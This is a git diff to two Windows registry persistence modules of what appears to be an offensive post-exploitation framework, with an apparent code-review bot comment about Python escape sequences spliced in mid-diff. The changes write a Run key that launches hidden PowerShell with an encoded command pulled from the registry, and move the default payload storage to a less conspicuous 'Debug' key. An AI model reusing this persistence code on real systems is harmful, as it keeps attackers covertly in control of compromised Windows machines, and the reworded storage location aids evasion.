diff --git a/lib/modules/persistence/elevated/registry.py b/lib/modules/persistence/elevated/registry.py
index 2cb257c..c83582e 100644
--- a/lib/modules/persistence/elevated/registry.py
+++ b/lib/modules/persistence/elevated/registry.py
@@ -50,7 +50,7 @@ class Module:
 'RegPath' : {
 'Description' : 'Registry location to store the script code. Last element is the key name.',
 'Required' : False,
- 'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
+ 'Value' : 'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
 },
 'ADSPath' : {
 'Description' : 'Alternate-data-stream location to store the script code.',
@@ -199,8 +199,8 @@ class Module:
 locationString = "$((gp "+path+" "+name+")."+name+")"
- script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"start -Win Hidden -A \"-enc "+locationString+"\" powershell\"';"
+ script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
 script += "'Registry persistence established "+statusMsg+"'"
- return script
\ No newline at end of file
+ return script
diff --git a/lib/modules/persistence/userland/registry.py b/lib/modules/persistence/userland/registry.py
index c4e214e..58bac3e 100644
--- a/lib/modules/persistence/userland/registry.py
+++ b/lib/modules/persistence/userland/registry.py
@@ -50,7 +50,7 @@ class Module:
 'RegPath' : {
 'Description' : 'Registry location to store the script code. Last element is the key name.',
 'Required' : False,
- 'Value' : 'HKCU:Software\Microsoft\Windows\CurrentVersion\Run'
+ 'Value' : 'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug'
 },
 'ADSPath' : {
 'Description' : 'Alternate-data-stream location to store the script code.',
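Review bot: The new `'Value'` default `'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'` is a plain (non-raw) string literal containing `\M`, `\W`, `\C` and `\D`, which Python treats as invalid escape sequences — they currently survive as backslash-plus-letter, but the interpreter emits a DeprecationWarning (SyntaxWarning from 3.12), and invalid escapes are slated to become a hard error. A raw literal, `r'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'`, yields the identical value without the warning. The same applies to the userland `@@ -50,7` hunk in this commit, where `r'HKCU:Software\Microsoft\Windows\CurrentVersion\Debug'` would be the equivalent. The option dictionary these lines belong to starts and ends outside the hunk.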
@@ -229,7 +229,7 @@ class Module:
 # set the run key to extract the encoded script from the specified location
 # and start powershell.exe in the background with the encoded command
- script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \"-enc $x\" powershell\"';"
+ script += "$null=Set-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
 script += "'Registry persistence established "+statusMsg+"'"